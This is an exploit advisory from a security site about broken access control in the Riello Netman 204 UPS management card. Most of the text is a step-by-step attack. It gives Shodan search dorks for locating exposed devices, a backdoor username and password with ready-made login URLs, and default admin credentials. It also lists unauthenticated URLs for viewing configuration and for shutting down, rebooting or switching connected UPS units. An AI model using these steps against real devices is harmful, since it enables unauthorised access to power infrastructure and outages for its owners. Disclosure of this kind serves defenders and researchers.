Netman 204 - Broken Access Control Remote command

2025.01.28
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Netman 204 - Broken Access Control Remote command # Date: 1/28/2025 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204) # Version: netman-204 # Tested on: Windows/Linux Step 1 : Attacker can using these dorks then can find the UPS panel . Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin # We Found Two panel Yellow and blue Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups . Yellow Panel : username and password : eurek Some exploits for that : http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek or https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek Due to flaws in parameter validation, the URL can be shortened to: http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek or https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek Blue Panel : username and password : admin Some Critical leaks without authentication we can see : http://IP/administration-commands.html http://IP/administration.html http://IP/administration.html# http://IP/administration.html#LDAP http://IP/administration.html#active-users http://IP/administration.html#firmware-upgrade http://IP/configuration.html http://IP/history.html http://IP/index.html http://IP/login.html http://IP/system-overview.html http://IP/table.html #With using up paths we can see the details of the UPS without authentication . First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) Some Remote commands without authentication : http://IP/administration-commands.html http://IP/administration-commands.html# http://IP/administration-commands.html#reboot-irms http://IP/administration-commands.html#reboot-mdu http://IP/administration-commands.html#reboot-xts http://IP/administration-commands.html#shutdown http://IP/administration-commands.html#shutdown-irms http://IP/administration-commands.html#shutdown-mdu http://IP/administration-commands.html#shutdown-restore http://IP/administration-commands.html#shutdown-restore-irms http://IP/administration-commands.html#shutdown-restore-mdu http://IP/administration-commands.html#shutdown-restore-xts http://IP/administration-commands.html#shutdown-xts http://IP/administration-commands.html#shutdownrestore http://IP/administration-commands.html#switch-irms http://IP/administration-commands.html#switch-on-bypass http://IP/administration-commands.html#test-battery


Vote for this issue:
100%
0%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top